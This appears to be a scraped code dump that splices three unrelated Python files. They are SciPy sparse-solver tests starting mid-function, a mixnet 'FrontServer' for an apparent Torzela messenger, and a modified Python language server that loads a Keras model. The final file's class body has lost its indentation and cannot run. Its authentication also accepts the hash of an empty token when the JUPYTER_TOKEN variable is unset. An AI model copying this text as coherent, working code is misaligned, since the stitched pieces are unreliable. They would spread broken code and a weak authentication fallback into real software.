        # "Bad" test case that leads SuperLU to call LAPACK with invalid
        # arguments. Check that it fails moderately gracefully.
        ij = np.array([(17, 0), (17, 6), (17, 12), (10, 13)], dtype=np.int32)
        v = np.array([0.284213, 0.94933781, 0.15767017, 0.38797296])
        A = csc_matrix((v, ij.T), shape=(20, 20))
        b = np.arange(20)
        with warnings.catch_warnings():
            try:
                # should either raise a runtimeerror or return value
                # appropriate for singular input
                x = spsolve(A, b, use_umfpack=False)
                assert_(not np.isfinite(x).any())
            except RuntimeError:
                pass
    def test_twodiags(self):
        """Solve a banded system across dtypes and csc/csr formats, with a
        residual bound scaled by the condition number."""
        A = spdiags([[1, 2, 3, 4, 5], [6, 5, 8, 9, 10]], [0, 1], 5, 5)
        b = array([1, 2, 3, 4, 5])
        # condition number of A
        cond_A = norm(A.todense(),2) * norm(inv(A.todense()),2)
        for t in ['f','d','F','D']:
            eps = finfo(t).eps  # floating point epsilon
            b = b.astype(t)
            for format in ['csc','csr']:
                Asp = A.astype(t).asformat(format)
                x = spsolve(Asp,b)
                assert_(norm(b - Asp*x) < 10 * cond_A * eps)
    def test_bvector_smoketest(self):
        """Round-trip: b = A @ x, then spsolve(A, b) recovers x (vector b)."""
        Adense = matrix([[0., 1., 1.],
                         [1., 0., 1.],
                         [0., 0., 1.]])
        As = csc_matrix(Adense)
        random.seed(1234)
        x = random.randn(3)
        b = As*x
        x2 = spsolve(As, b)
        assert_array_almost_equal(x, x2)
    def test_bmatrix_smoketest(self):
        """Round-trip with a sparse right-hand-side matrix B."""
        Adense = matrix([[0., 1., 1.],
                         [1., 0., 1.],
                         [0., 0., 1.]])
        As = csc_matrix(Adense)
        random.seed(1234)
        x = random.randn(3, 4)
        Bdense = As.dot(x)
        Bs = csc_matrix(Bdense)
        x2 = spsolve(As, Bs)
        assert_array_almost_equal(x, x2.todense())
    def test_non_square(self):
        """Non-square A and shape-incompatible b both raise ValueError."""
        with warnings.catch_warnings():
            warnings.simplefilter("ignore", category=SparseEfficiencyWarning)
            # A is not square.
            A = ones((3, 4))
            b = ones((4, 1))
            assert_raises(ValueError, spsolve, A, b)
            # A2 and b2 have incompatible shapes.
            A2 = csc_matrix(eye(3))
            b2 = array([1.0, 2.0])
            assert_raises(ValueError, spsolve, A2, b2)
    def test_example_comparison(self):
        """Sparse spsolve agrees with dense scipy.linalg.solve."""
        with warnings.catch_warnings():
            warnings.simplefilter("ignore", category=SparseEfficiencyWarning)
            row = array([0,0,1,2,2,2])
            col = array([0,2,2,0,1,2])
            data = array([1,2,3,-4,5,6])
            sM = csr_matrix((data,(row,col)), shape=(3,3), dtype=float)
            M = sM.todense()
            row = array([0,0,1,1,0,0])
            col = array([0,2,1,1,0,0])
            data = array([1,1,1,1,1,1])
            sN = csr_matrix((data, (row,col)), shape=(3,3), dtype=float)
            N = sN.todense()
            sX = spsolve(sM, sN)
            X = scipy.linalg.solve(M, N)
            assert_array_almost_equal(X, sX.todense())
    def test_shape_compatibility(self):
        """spsolve accepts many b containers/shapes and preserves vector vs
        matrix output conventions for each sparse input format."""
        A = csc_matrix([[1., 0], [0, 2]])
        bs = [
            [1, 6],
            array([1, 6]),
            [[1], [6]],
            array([[1], [6]]),
            csc_matrix([[1], [6]]),
            csr_matrix([[1], [6]]),
            dok_matrix([[1], [6]]),
            bsr_matrix([[1], [6]]),
            array([[1., 2., 3.], [6., 8., 10.]]),
            csc_matrix([[1., 2., 3.], [6., 8., 10.]]),
            csr_matrix([[1., 2., 3.], [6., 8., 10.]]),
            dok_matrix([[1., 2., 3.], [6., 8., 10.]]),
            bsr_matrix([[1., 2., 3.], [6., 8., 10.]]),
        ]
        for b in bs:
            x = np.linalg.solve(A.toarray(), toarray(b))
            for spmattype in [csc_matrix, csr_matrix, dok_matrix, lil_matrix]:
                x1 = spsolve(spmattype(A), b, use_umfpack=True)
                x2 = spsolve(spmattype(A), b, use_umfpack=False)
                # check solution
                if x.ndim == 2 and x.shape[1] == 1:
                    # interprets also these as "vectors"
                    x = x.ravel()
                assert_array_almost_equal(toarray(x1), x, err_msg=repr((b, spmattype, 1)))
                assert_array_almost_equal(toarray(x2), x, err_msg=repr((b, spmattype, 2)))
                # dense vs. sparse output ("vectors" are always dense)
                if isspmatrix(b) and x.ndim > 1:
                    assert_(isspmatrix(x1), repr((b, spmattype, 1)))
                    assert_(isspmatrix(x2), repr((b, spmattype, 2)))
                else:
                    assert_(isinstance(x1, np.ndarray), repr((b, spmattype, 1)))
                    assert_(isinstance(x2, np.ndarray), repr((b, spmattype, 2)))
                # check output shape
                if x.ndim == 1:
                    # "vector"
                    assert_equal(x1.shape, (A.shape[1],))
                    assert_equal(x2.shape, (A.shape[1],))
                else:
                    # "matrix"
                    assert_equal(x1.shape, x.shape)
                    assert_equal(x2.shape, x.shape)
        A = csc_matrix((3, 3))
        b = csc_matrix((1, 3))
        assert_raises(ValueError, spsolve, A, b)
    def test_ndarray_support(self):
        """Dense ndarray A and matrix b are supported directly."""
        A = array([[1., 2.], [2., 0.]])
        x = array([[1., 1.], [0.5, -0.5]])
        b = array([[2., 0.], [2., 2.]])
        assert_array_almost_equal(x, spsolve(A, b))
    def test_gssv_badinput(self):
        """The low-level _superlu.gssv rejects malformed array arguments."""
        N = 10
        d = arange(N) + 1.0
        A = spdiags((d, 2*d, d[::-1]), (-3, 0, 5), N, N)
        for spmatrix in (csc_matrix, csr_matrix):
            A = spmatrix(A)
            b = np.arange(N)
            # Each helper corrupts one property the C code requires.
            def not_c_contig(x):
                return x.repeat(2)[::2]
            def not_1dim(x):
                return x[:,None]
            def bad_type(x):
                return x.astype(bool)
            def too_short(x):
                return x[:-1]
            badops = [not_c_contig, not_1dim, bad_type, too_short]
            for badop in badops:
                msg = "%r %r" % (spmatrix, badop)
                # Not C-contiguous
                assert_raises((ValueError, TypeError), _superlu.gssv,
                              N, A.nnz, badop(A.data), A.indices, A.indptr,
                              b, int(spmatrix == csc_matrix), err_msg=msg)
                assert_raises((ValueError, TypeError), _superlu.gssv,
                              N, A.nnz, A.data, badop(A.indices), A.indptr,
                              b, int(spmatrix == csc_matrix), err_msg=msg)
                assert_raises((ValueError, TypeError), _superlu.gssv,
                              N, A.nnz, A.data, A.indices, badop(A.indptr),
                              b, int(spmatrix == csc_matrix), err_msg=msg)
    def test_sparsity_preservation(self):
        """Solving with a sparse rhs keeps the result sparse."""
        ident = csc_matrix([
            [1, 0, 0],
            [0, 1, 0],
            [0, 0, 1]])
        b = csc_matrix([
            [0, 1],
            [1, 0],
            [0, 0]])
        x = spsolve(ident, b)
        assert_equal(ident.nnz, 3)
        assert_equal(b.nnz, 2)
        assert_equal(x.nnz, 2)
        assert_allclose(x.A, b.A, atol=1e-12, rtol=1e-12)
class TestSplu(object):
    """Tests for the SuperLU-based sparse LU factorizations splu/spilu."""

    def setUp(self):
        # Banded 40x40 test matrix with varying diagonal weights.
        n = 40
        d = arange(n) + 1
        self.n = n
        self.A = spdiags((d, 2*d, d[::-1]), (-3, 0, 5), n, n)
        random.seed(1234)

    def _smoketest(self, spxlu, check, dtype):
        """Factor A (cast to dtype) with spxlu, then run check() on solves
        for RHS of assorted shapes, including transpose/adjoint solves."""
        if np.issubdtype(dtype, np.complexfloating):
            A = self.A + 1j*self.A.T
        else:
            A = self.A

        A = A.astype(dtype)
        lu = spxlu(A)

        rng = random.RandomState(1234)

        # Input shapes: 1-D RHS, then matrices narrower/equal/wider than n.
        for k in [None, 1, 2, self.n, self.n+2]:
            msg = "k=%r" % (k,)

            if k is None:
                b = rng.rand(self.n)
            else:
                b = rng.rand(self.n, k)

            if np.issubdtype(dtype, np.complexfloating):
                b = b + 1j*rng.rand(*b.shape)
            b = b.astype(dtype)

            x = lu.solve(b)
            check(A, b, x, msg)

            # 'T' solves with A^T, 'H' with the conjugate transpose.
            x = lu.solve(b, 'T')
            check(A.T, b, x, msg)

            x = lu.solve(b, 'H')
            check(A.T.conj(), b, x, msg)

    def test_splu_smoketest(self):
        # Check that splu works at all
        with warnings.catch_warnings():
            warnings.simplefilter("ignore", category=SparseEfficiencyWarning)

            def check(A, b, x, msg=""):
                # Exact LU: residual should be within a modest multiple of eps.
                eps = np.finfo(A.dtype).eps
                r = A * x
                assert_(abs(r - b).max() < 1e3*eps, msg)

            self._smoketest(splu, check, np.float32)
            self._smoketest(splu, check, np.float64)
            self._smoketest(splu, check, np.complex64)
            self._smoketest(splu, check, np.complex128)

    def test_spilu_smoketest(self):
        with warnings.catch_warnings():
            warnings.simplefilter("ignore", category=SparseEfficiencyWarning)

            errors = []

            def check(A, b, x, msg=""):
                # Incomplete LU: only a loose residual bound applies.
                r = A * x
                err = abs(r - b).max()
                assert_(err < 1e-2, msg)
                if b.dtype in (np.float64, np.complex128):
                    errors.append(err)

            self._smoketest(spilu, check, np.float32)
            self._smoketest(spilu, check, np.float64)
            self._smoketest(spilu, check, np.complex64)
            self._smoketest(spilu, check, np.complex128)

            # If spilu were exact the errors would be at eps level; this
            # confirms the factorization really is incomplete.
            assert_(max(errors) > 1e-5)

    def test_splu_nnz0(self):
        # An all-zero (hence singular) matrix must be rejected.
        A = csc_matrix((5,5), dtype='d')
        assert_raises(RuntimeError, splu, A)

    def test_spilu_nnz0(self):
        # Same for the incomplete factorization.
        A = csc_matrix((5,5), dtype='d')
        assert_raises(RuntimeError, spilu, A)

    def test_splu_basic(self):
        # Test basic splu functionality.
        n = 30
        rng = random.RandomState(12)
        a = rng.rand(n, n)
        a[a < 0.95] = 0
        # First test with a singular matrix
        a[:, 0] = 0
        a_ = csc_matrix(a)
        # Matrix is exactly singular
        assert_raises(RuntimeError, splu, a_)

        # Make a diagonal dominant, to make sure it is not singular
        a += 4*eye(n)
        a_ = csc_matrix(a)
        lu = splu(a_)
        b = ones(n)
        x = lu.solve(b)
        assert_almost_equal(dot(a, x), b)

    def test_splu_perm(self):
        # Test the permutation vectors exposed by splu.
        n = 30
        a = random.random((n, n))
        a[a < 0.95] = 0
        # Make a diagonal dominant, to make sure it is not singular
        a += 4*eye(n)
        a_ = csc_matrix(a)
        lu = splu(a_)
        # Check that the permutation indices do belong to [0, n-1].
        for perm in (lu.perm_r, lu.perm_c):
            assert_(all(perm > -1))
            assert_(all(perm < n))
            # Each index appears exactly once: a true permutation.
            assert_equal(len(unique(perm)), len(perm))

        # Now make a symmetric, and test that the two permutation vectors are
        # the same
        # Note: a += a.T relies on undefined behavior.
        a = a + a.T
        a_ = csc_matrix(a)
        lu = splu(a_)
        assert_array_equal(lu.perm_r, lu.perm_c)

    def test_lu_refcount(self):
        # Test that we are keeping track of the reference count with splu.
        n = 30
        a = random.random((n, n))
        a[a < 0.95] = 0
        # Make a diagonal dominant, to make sure it is not singular
        a += 4*eye(n)
        a_ = csc_matrix(a)
        lu = splu(a_)

        # And now test that we don't have a refcount bug
        import sys
        rc = sys.getrefcount(lu)
        for attr in ('perm_r', 'perm_c'):
            # Each exposed perm array must hold exactly one reference to lu
            # while alive, and release it when deleted.
            perm = getattr(lu, attr)
            assert_equal(sys.getrefcount(lu), rc + 1)
            del perm
            assert_equal(sys.getrefcount(lu), rc)

    def test_bad_inputs(self):
        A = self.A.tocsc()

        # Non-square slices cannot be factorized.
        assert_raises(ValueError, splu, A[:,:4])
        assert_raises(ValueError, spilu, A[:,:4])

        for lu in [splu(A), spilu(A)]:
            # RHS sizes 42 != n=40: shape mismatch; 3-D RHS: bad rank.
            b = random.rand(42)
            B = random.rand(42, 3)
            BB = random.rand(self.n, 3, 9)
            assert_raises(ValueError, lu.solve, b)
            assert_raises(ValueError, lu.solve, B)
            assert_raises(ValueError, lu.solve, BB)
            # Complex RHS against a real factorization is a dtype error.
            assert_raises(TypeError, lu.solve,
                          b.astype(np.complex64))
            assert_raises(TypeError, lu.solve,
                          b.astype(np.complex128))

    def test_superlu_dlamch_i386_nan(self):
        # SuperLU 4.3 calls some functions returning floats without
        # declaring them. On i386@linux call convention, this fails to
        # clear floating point registers after call. As a result, NaN
        # can appear in the next floating point operation made.
        #
        # Here's a test case that triggered the issue.
        n = 8
        d = np.arange(n) + 1
        A = spdiags((d, 2*d, d[::-1]), (-3, 0, 5), n, n)
        A = A.astype(np.float32)
        spilu(A)
        A = A + 1j*A
        B = A.A
        assert_(not np.isnan(B).any())

    def test_lu_attr(self):

        def check(dtype, complex_2=False):
            A = self.A.astype(dtype)

            if complex_2:
                A = A + 1j*A.T

            n = A.shape[0]
            lu = splu(A)

            # Check that the decomposition is as advertized
            # i.e. Pr * A * Pc == L * U for the exposed permutations.
            Pc = np.zeros((n, n))
            Pc[np.arange(n), lu.perm_c] = 1

            Pr = np.zeros((n, n))
            Pr[lu.perm_r, np.arange(n)] = 1

            Ad = A.toarray()
            lhs = Pr.dot(Ad).dot(Pc)
            rhs = (lu.L * lu.U).toarray()

            eps = np.finfo(dtype).eps

            assert_allclose(lhs, rhs, atol=100*eps)

        check(np.float32)
        check(np.float64)
        check(np.complex64)
        check(np.complex128)
        check(np.complex64, True)
        check(np.complex128, True)

    def test_threads_parallel(self):
        # Run three of the tests above concurrently to exercise SuperLU's
        # thread-safety; every worker must succeed.
        oks = []

        def worker():
            try:
                self.test_splu_basic()
                self.test_splu_smoketest()
                self.test_spilu_smoketest()
                oks.append(True)
            except:
                # NOTE(review): bare except deliberately swallows failures so
                # the final count below detects them; the traceback is lost.
                pass

        threads = [threading.Thread(target=worker)
                   for k in range(20)]
        for t in threads:
            t.start()
        for t in threads:
            t.join()

        assert_equal(len(oks), 20)
# Allow running this test module directly (legacy numpy test runner).
if __name__ == "__main__":
    run_module_suite()
|
FrontServer.py | #!/usr/bin/env python3
import socket
import threading
import asyncio
import time
from message import Message
import TorzelaUtils as TU
# Initialize a class specifically for the round info.
# This class will track if a round is currently ongoing or not, the
# actual identifying number of the round, the time it ended, and the lock
# (so that no other messages are sent during the time of the round)
class RoundInfo:
    """State of a single messaging round.

    Records the round's identifying number, whether the round is still
    accepting messages, and its end-time value as supplied by the caller.
    """

    def __init__(self, newRound, endTime):
        # A freshly created round is immediately open for messages.
        self.open = True
        # Identifying number of this round.
        self.round = newRound
        # End-time value handed in by the round manager.
        self.endTime = endTime
class FrontServer:
    """First hop of the server chain.

    Accepts client connections, batches client messages into timed rounds,
    shuffles them (mixnet step) and forwards them to the next server, then
    routes the responses back to the originating clients.

    Fixes relative to the previous revision:
      * ``manageRounds`` constructed ``RoundInfo(round, ...)`` — passing the
        *builtin* ``round`` function instead of the round id.
      * ``manageRounds`` reset a nonexistent ``clientIPsAndPorts`` list and
        never cleared ``clientPublicKeys``, so every client was permanently
        blocked from sending after its first round.
      * Round timing used ``time.process_time()`` (CPU time) and busy-wait
        loops; now uses wall-clock ``time.monotonic()`` and short sleeps.
      * ``currentRound`` started as ``""`` which crashed the first
        ``.open`` access; it now starts as ``None`` and is guarded.
    """

    # Set the IP and Port of the next server. Also set the listening port
    # for incoming connections. The next server in the chain can
    # be a Middle Server or even a Spreading Server
    def __init__(self, nextServerIP, nextServerPort, localPort):
        self.nextServerIP = nextServerIP
        self.nextServerPort = nextServerPort
        self.localPort = localPort

        # Round bookkeeping: roundID counts rounds, rounds maps id ->
        # RoundInfo, currentRound is the active round (None until the
        # first round starts).
        self.roundID = 1
        self.rounds = {}
        self.lock = asyncio.Lock()
        self.roundDuration = 2  # seconds a round stays open for messages
        self.currentRound = None

        # This will allow us to associate a client with it's public key
        # So that we can figure out which client should get which packet
        # Entries are in the form
        # ((<IP>,<Port>), <Public Key>)  (i.e. (('localhost', 80), "mykey"))
        self.clientList = []

        # Per-round parallel arrays. Position i of each holds, for the
        # i-th message received this round:
        #   key ; message ; public key -- respectively.
        self.clientLocalKeys = []
        self.clientMessages = []
        self.clientPublicKeys = []

        # The server keys
        self.__privateKey, self.publicKey = TU.generateKeys(
            TU.createKeyGenerator())

        # We need to spawn off threads here, else we would block
        # the entire program.
        threading.Thread(target=self.setupConnection, args=()).start()
        # Setup main listening socket to accept incoming connections
        threading.Thread(target=self.listen, args=()).start()
        # Create a new thread to handle the round timings
        threading.Thread(target=self.manageRounds, args=()).start()

    def getPublicKey(self):
        """Return this server's public key."""
        return self.publicKey

    def setupConnection(self):
        """Register with the next server, retrying until it is reachable."""
        # Before we can connect to the next server, we need
        # to send a setup message to the next server
        setupMsg = Message()
        setupMsg.setType(0)
        setupMsg.setPayload("{}".format(self.localPort))

        self.connectionMade = False
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        while not self.connectionMade:
            try:
                sock.connect((self.nextServerIP, self.nextServerPort))
                sock.sendall(str.encode(str(setupMsg)))
                self.connectionMade = True
            except OSError:
                # Next server not up yet; wait so we don't burn CPU time.
                time.sleep(1)
        sock.close()
        print("FrontServer successfully connected!")

    # This is where all messages are handled
    def listen(self):
        """Accept incoming connections forever, one handler thread each."""
        # Wait until we have connected to the next server
        while not self.connectionMade:
            time.sleep(1)

        # Listen for incoming connections
        self.listenSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.listenSock.bind(('localhost', self.localPort))
        self.listenSock.listen(10)  # buffer 10 connections

        while True:
            print("FrontServer awaiting connection")
            conn, client_addr = self.listenSock.accept()
            print("FrontServer accepted connection from " + str(client_addr))
            # Spawn a thread to handle the client
            threading.Thread(target=self.handleMsg, args=(conn, client_addr,)).start()

    # This runs in a thread and handles messages from clients
    def handleMsg(self, conn, client_addr):
        """Dispatch one incoming message by its netInfo type.

        0: client registration; 1: client -> dead-drop (round traffic);
        2: response from the Middle server; 3: dialing protocol.
        """
        # Receive data from client
        clientData = conn.recv(32768).decode("utf-8")

        # Format as message
        clientMsg = Message()
        clientMsg.loadFromString(clientData)

        clientIP = client_addr[0]

        if clientMsg.getNetInfo() != 1 and clientMsg.getNetInfo() != 2:
            print("FrontServer got " + clientData)

        # Check if the packet is for setting up a connection
        if clientMsg.getNetInfo() == 0:
            # Add client's public key to our list of clients
            clientPort, clientPublicKey = clientMsg.getPayload().split("|")
            # Build the entry for the client. See clientList above.
            # Store the public key as a string.
            clientEntry = ((clientIP, clientPort), clientPublicKey)
            if clientEntry not in self.clientList:
                self.clientList.append(clientEntry)
            conn.close()
        elif clientMsg.getNetInfo() == 1:
            print("Front Server received message from client")
            # Process packets coming from a client and headed towards
            # a dead drop only if the current round is active and the client
            # hasn't already sent a message this round.
            clientPublicKey, payload = clientMsg.getPayload().split("#", 1)
            if (self.currentRound is not None and self.currentRound.open
                    and clientPublicKey not in self.clientPublicKeys):
                # Decrypt one layer of the onion message
                clientLocalKey, newPayload = TU.decryptOnionLayer(
                    self.__privateKey, payload, serverType=0)
                clientMsg.setPayload(newPayload)

                # Save the message data.
                # TODO (jose) -> use the lock here. Multiple threads could try
                # to access this info at the same time. In fact, we should
                # process messages with netinfo == 1 ONE AT A TIME or could
                # create inconsistencies.
                self.clientPublicKeys.append(clientPublicKey)
                self.clientLocalKeys.append(clientLocalKey)
                self.clientMessages.append(clientMsg)
        elif clientMsg.getNetInfo() == 2:
            print("FrontServer received message from Middle server")
            # TODO -> add a lock here, same as with netinfo == 1

            # Responses arrive in shuffled order; len(clientMessages) is the
            # count received so far, so it indexes the matching local key
            # (clientLocalKeys was shuffled with the same permutation).
            clientLocalKey = self.clientLocalKeys[len(self.clientMessages)]
            # Encrypt one layer of the onion message
            newPayload = TU.encryptOnionLayer(self.__privateKey,
                                              clientLocalKey,
                                              clientMsg.getPayload())
            clientMsg.setPayload(newPayload)
            self.clientMessages.append(clientMsg)
        elif clientMsg.getNetInfo() == 3:
            # Dialing Protocol: Client -> DeadDrop
            _, newPayload = TU.decryptOnionLayer(
                self.__privateKey, clientMsg.getPayload(), serverType=0)
            clientMsg.setPayload(newPayload)

            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.connect((self.nextServerIP, self.nextServerPort))
            sock.sendall(str(clientMsg).encode("utf-8"))
            sock.close()

    # A thread running this method will be in charge of the different rounds
    def manageRounds(self):
        """Background loop: open a round, collect messages, run the mixnet."""
        while True:
            time.sleep(10)

            # Reset the saved info about the messages before the round
            # starts. Clearing clientPublicKeys is essential: the
            # netinfo == 1 handler rejects keys already present, so a stale
            # list would permanently block returning clients.
            self.clientLocalKeys = []
            self.clientMessages = []
            self.clientPublicKeys = []

            # Create the new round using our class above.
            # BUGFIX: previously passed the builtin `round` function here.
            self.currentRound = RoundInfo(self.roundID, self.roundDuration)
            self.rounds[self.roundID] = self.currentRound
            print("Front Server starts round: ", self.roundID)

            # Tell all the clients that a new round just started
            firstMsg = Message()
            firstMsg.setNetInfo(5)
            for clientIpAndPort, clientPK in self.clientList:
                tempSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                tempSock.connect((clientIpAndPort[0], int(clientIpAndPort[1])))
                tempSock.sendall(str.encode(str(firstMsg)))
                tempSock.close()

            # Keep the round open for roundDuration seconds of wall-clock
            # time. monotonic() measures elapsed time (process_time() only
            # counts CPU time), and sleeping avoids a busy-wait.
            startTime = time.monotonic()
            while time.monotonic() - startTime < self.roundDuration:
                time.sleep(0.05)

            # Now that round has ended, mark current round as closed
            self.currentRound.open = False

            # TODO -> Once the noise addition is added, the rounds should
            # ALWAYS run, no matter if there are no messages
            if len(self.clientMessages) > 0:
                # Now that all the messages are stored in self.clientMessages,
                # run the round
                self.runRound()

            print("Front Server finished round: ", self.roundID)
            self.roundID += 1

    # Runs server round. Assuming that the messages are stored in
    # self.clientMessages, adds noise, shuffles them and forwards them to
    # the next server
    def runRound(self):
        """Shuffle the round's messages, forward them, and route replies."""
        # TODO (jose): Noise addition goes here

        # Apply the mixnet by shuffling the messages
        nMessages = len(self.clientMessages)
        permutation = TU.generatePermutation(nMessages)
        shuffledMessages = TU.shuffleWithPermutation(self.clientMessages,
                                                    permutation)

        # Also shuffle the keys so they still match the messages:
        # self.clientLocalKeys[i] is the key that unlocks shuffledMessages[i].
        # This is used afterwards in handleMsg, getNetInfo() == 2.
        self.clientLocalKeys = TU.shuffleWithPermutation(self.clientLocalKeys,
                                                         permutation)

        # Send a message to the next server notifying it of the number of
        # messages that will be sent.
        firstMsg = Message()
        firstMsg.setNetInfo(4)
        firstMsg.setPayload("{}".format(nMessages))
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.connect((self.nextServerIP, self.nextServerPort))
        sock.sendall(str(firstMsg).encode("utf-8"))
        sock.close()

        # Send all the messages to the next server
        for msg in shuffledMessages:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.connect((self.nextServerIP, self.nextServerPort))
            sock.sendall(str(msg).encode("utf-8"))
            sock.close()

        # Restart the messages so that we receive the responses from the
        # next server
        self.clientMessages = []

        # Wait until we have received all the responses. These responses are
        # handled in the listener thread via handleMsg with
        # msg.getNetInfo() == 2. Sleep between checks to avoid busy-waiting.
        print("Front Server waiting for responses from Middle Server")
        while len(self.clientMessages) < nMessages:
            time.sleep(0.05)

        # Unshuffle the messages
        self.clientMessages = TU.unshuffleWithPermutation(self.clientMessages,
                                                          permutation)

        # Send each response back to the correct client
        for clientPK, msg in zip(self.clientPublicKeys, self.clientMessages):
            # Find the client ip and port using the clients' keys
            matches = [(ip, port) for ((ip, port), pk) in self.clientList
                       if clientPK == pk]
            if len(matches) == 0:
                print("Front server error: couldn't find client where to send the response")
                continue
            elif len(matches) > 1:
                print("Front server error: too many clients where to send the response")
                continue

            clientIP, clientPort = matches[0]
            clientPort = int(clientPort)
            tempSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            tempSock.connect((clientIP, clientPort))
            tempSock.sendall(str(msg).encode("utf-8"))
            tempSock.close()
|
python_ls.py | # Copyright 2017 Palantir Technologies, Inc.
import json
import logging
import os
import socketserver
import threading
import keras
import numpy as np
from functools import partial
from hashlib import sha256
from pyls_jsonrpc.dispatchers import MethodDispatcher
from pyls_jsonrpc.endpoint import Endpoint
from pyls_jsonrpc.streams import JsonRpcStreamReader, JsonRpcStreamWriter
from keras.models import model_from_json
from . import lsp, _utils, uris
from .config import config
from .workspace import Workspace
log = logging.getLogger(__name__)

LINT_DEBOUNCE_S = 0.5  # 500 ms
PARENT_PROCESS_WATCH_INTERVAL = 10  # 10 s
# Thread pool size for the JSON-RPC endpoint's request handlers.
MAX_WORKERS = 64
PYTHON_FILE_EXTENSIONS = ('.py', '.pyi')
# Files whose change invalidates the cached lint/plugin configuration.
CONFIG_FILEs = ('pycodestyle.cfg', 'setup.cfg', 'tox.ini', '.flake8')
class _StreamHandlerWrapper(socketserver.StreamRequestHandler, object):
    """A wrapper class that is used to construct a custom handler class.

    The concrete subclass is built dynamically (see start_tcp_lang_server)
    with two class attributes injected: DELEGATE_CLASS, a factory producing
    the language-server delegate, and SHUTDOWN_CALL, invoked when the
    connection's session ends.
    """

    delegate = None

    def setup(self):
        super(_StreamHandlerWrapper, self).setup()
        # pylint: disable=no-member
        self.delegate = self.DELEGATE_CLASS(self.rfile, self.wfile)

    def handle(self):
        # Only start the delegate server once the peer has authenticated.
        self.auth(self.delegate.start)
        # pylint: disable=no-member
        self.SHUTDOWN_CALL()

    def auth(self, cb):
        """Read one auth line from the peer and call ``cb`` on success.

        The peer must send a JSON object whose 'token' equals the SHA-256
        hex digest of the JUPYTER_TOKEN environment variable. On any
        failure an error JSON message is written back and ``cb`` is not
        called.
        """
        token = ''
        if "JUPYTER_TOKEN" in os.environ:
            token = os.environ["JUPYTER_TOKEN"]
        else:
            # Fix: Logger.warn() is deprecated in favor of warning().
            log.warning('! Missing jupyter token !')
        data = self.rfile.readline()
        try:
            auth_req = json.loads(data.decode().split('\n')[0])
        except (UnicodeDecodeError, ValueError):
            # Fix: was a bare `except:` which also swallowed e.g.
            # KeyboardInterrupt. decode() raises UnicodeDecodeError;
            # json.loads raises JSONDecodeError (a ValueError subclass).
            log.error('Error parsing authentication message')
            auth_error_msg = {'msg': 'AUTH_ERROR'}
            self.wfile.write(json.dumps(auth_error_msg).encode())
            return
        hashed_token = sha256(token.encode()).hexdigest()
        # Fix: guard against valid-JSON-but-not-an-object payloads (e.g. a
        # bare list/number), which previously crashed on .get().
        if isinstance(auth_req, dict) and auth_req.get('token') == hashed_token:
            auth_success_msg = {'msg': 'AUTH_SUCCESS'}
            self.wfile.write(json.dumps(auth_success_msg).encode())
            cb()
        else:
            log.info('Failed to authenticate: invalid credentials')
            auth_invalid_msg = {'msg': 'AUTH_INVALID_CRED'}
            self.wfile.write(json.dumps(auth_invalid_msg).encode())
def start_tcp_lang_server(bind_addr, port, check_parent_process, handler_class):
    """Serve ``handler_class`` language servers over a TCP socket.

    Builds a request-handler subclass of _StreamHandlerWrapper bound to
    ``handler_class`` and runs a TCPServer on (bind_addr, port) until
    shutdown.
    """
    if not issubclass(handler_class, PythonLanguageServer):
        raise ValueError('Handler class must be an instance of PythonLanguageServer')

    def shutdown_server(*args):
        # pylint: disable=unused-argument
        log.debug('Shutting down server')
        # Shutdown call must be done on a thread, to prevent deadlocks
        threading.Thread(target=server.shutdown).start()

    # Construct a custom wrapper class around the user's handler_class
    delegate_factory = partial(handler_class,
                               check_parent_process=check_parent_process)
    wrapper_class = type(
        handler_class.__name__ + 'Handler',
        (_StreamHandlerWrapper,),
        {
            'DELEGATE_CLASS': delegate_factory,
            'SHUTDOWN_CALL': shutdown_server,
        },
    )

    # Bind manually so allow_reuse_address takes effect before binding.
    server = socketserver.TCPServer((bind_addr, port), wrapper_class,
                                    bind_and_activate=False)
    server.allow_reuse_address = True

    try:
        server.server_bind()
        server.server_activate()
        log.info('Serving %s on (%s, %s)', handler_class.__name__, bind_addr, port)
        server.serve_forever()
    finally:
        log.info('Shutting down')
        server.server_close()
def start_io_lang_server(rfile, wfile, check_parent_process, handler_class):
    """Run a ``handler_class`` language server over the given IO streams."""
    if not issubclass(handler_class, PythonLanguageServer):
        raise ValueError('Handler class must be an instance of PythonLanguageServer')
    log.info('Starting %s IO language server', handler_class.__name__)
    handler_class(rfile, wfile, check_parent_process).start()
class PythonLanguageServer(MethodDispatcher):
""" Implementation of the Microsoft VSCode Language Server Protocol
https://github.com/Microsoft/language-server-protocol/blob/master/versions/protocol-1-x.md
"""
# pylint: disable=too-many-public-methods,redefined-builtin
def __init__(self, rx, tx, check_parent_process=False):
self.workspace = None
self.config = None
self.root_uri = None
self.watching_thread = None
self.workspaces = {}
self.uri_workspace_mapper = {}
self._jsonrpc_stream_reader = JsonRpcStreamReader(rx)
self._jsonrpc_stream_writer = JsonRpcStreamWriter(tx)
self._check_parent_process = check_parent_process
self._endpoint = Endpoint(self, self._jsonrpc_stream_writer.write, max_workers=MAX_WORKERS)
self._dispatchers = []
self._shutdown = False
with open("model/model.json", 'r') as json_file:
loaded_model_json = json_file.read()
self.model = model_from_json(loaded_model_json)
self.model.load_weights("model/model.h5")
self.encodings = {}
with open("model/encodings_int.json", 'r') as json_file:
self.encodings = json.load(json_file)
log.info("loaded the model, weights and encodings")
self.vocab = self.encodings.keys()
def start(self):
"""Entry point for the server."""
self._jsonrpc_stream_reader.listen(self._endpoint.consume)
def __getitem__(self, item):
"""Override getitem to fallback through multiple dispatchers."""
if self._shutdown and item != 'exit':
# exit is the only allowed method during shutdown
log.debug("Ignoring non-exit method during shutdown: %s", item)
raise KeyError
try:
return super(PythonLanguageServer, self).__getitem__(item)
except KeyError:
# Fallback through extra dispatchers
for dispatcher in self._dispatchers:
try:
return dispatcher[item]
except KeyError:
continue
raise KeyError()
def m_shutdown(self, **_kwargs):
self._shutdown = True
return None
def m_exit(self, **_kwargs):
self._endpoint.shutdown()
self._jsonrpc_stream_reader.close()
self._jsonrpc_stream_writer.close()
def _match_uri_to_workspace(self, uri):
workspace_uri = _utils.match_uri_to_workspace(uri, self.workspaces)
return self.workspaces.get(workspace_uri, self.workspace)
